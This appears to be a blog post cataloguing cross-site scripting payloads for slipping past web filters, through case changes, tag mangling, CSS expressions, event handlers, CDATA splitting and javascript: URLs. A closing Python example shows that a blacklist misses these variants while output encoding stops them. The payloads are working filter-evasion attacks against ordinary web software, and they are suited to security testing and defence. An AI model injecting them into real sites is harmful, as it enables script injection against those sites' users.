Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Vary the letter case.

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks.

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another file extension in place of .js.

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file.

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag.

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tabs or newlines to evade filters.

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

7. Use "\" to evade filters.

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade filters (the ";" may also be dropped).

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Original: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Original: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handler attributes).

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF file.

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url.

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

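Items 1, 2 and 5 above all target the same weakness: a blacklist that looks for the literal tag text. The following example is added here and is not from the original post; it passes the post's own variants (constructed inline) through a hypothetical lowercase blacklist filter and through context-aware HTML output encoding, then checks which outputs still contain a raw `<` that the HTML tokenizer would treat as the start of markup.

```python
import html
import re

# Constructed inputs taken from the variants listed above (items 1, 2 and 5),
# plus a plain <script> tag as the baseline the blacklist was written for.
SAMPLES = [
    "<script>alert(1)</script>",          # plain tag: the only one the blacklist matches
    "<sCript>alert('d')</scRipT>",        # item 1: letter case varied
    "<<script>alert('c')//<</script>",    # item 2: extra characters around the tag
    '<SCRIPT/SRC="t.js"></SCRIPT>',       # item 5: separator inside the tag
]

# Hypothetical blacklist filter: strips the exact lowercase tag names only.
NAIVE_PATTERN = re.compile(r"</?script>")


def naive_blacklist_filter(s: str) -> str:
    """Remove literal <script> and </script>; everything else passes through."""
    return NAIVE_PATTERN.sub("", s)


def encode_for_html_body(s: str) -> str:
    """Context-aware output encoding for an HTML text node or quoted attribute."""
    return html.escape(s, quote=True)


def opens_markup(s: str) -> bool:
    """True if a raw '<' could still start a tag, end tag, comment or bogus comment.

    The HTML tokenizer only leaves the data state on '<' followed by an ASCII
    letter, '/', '!' or '?'; any other '<' is emitted as ordinary text.
    """
    return re.search(r"<[A-Za-z/!?]", s) is not None


def survivors(filter_fn) -> list:
    """Return the samples whose filtered form still contains live markup."""
    return [p for p in SAMPLES if opens_markup(filter_fn(p))]


if __name__ == "__main__":
    print("blacklist leaves markup in:", survivors(naive_blacklist_filter))
    print("encoding leaves markup in:", survivors(encode_for_html_body))
```

The blacklist neutralises only the plain tag; encoding neutralises every variant because it never has to recognise the tag at all.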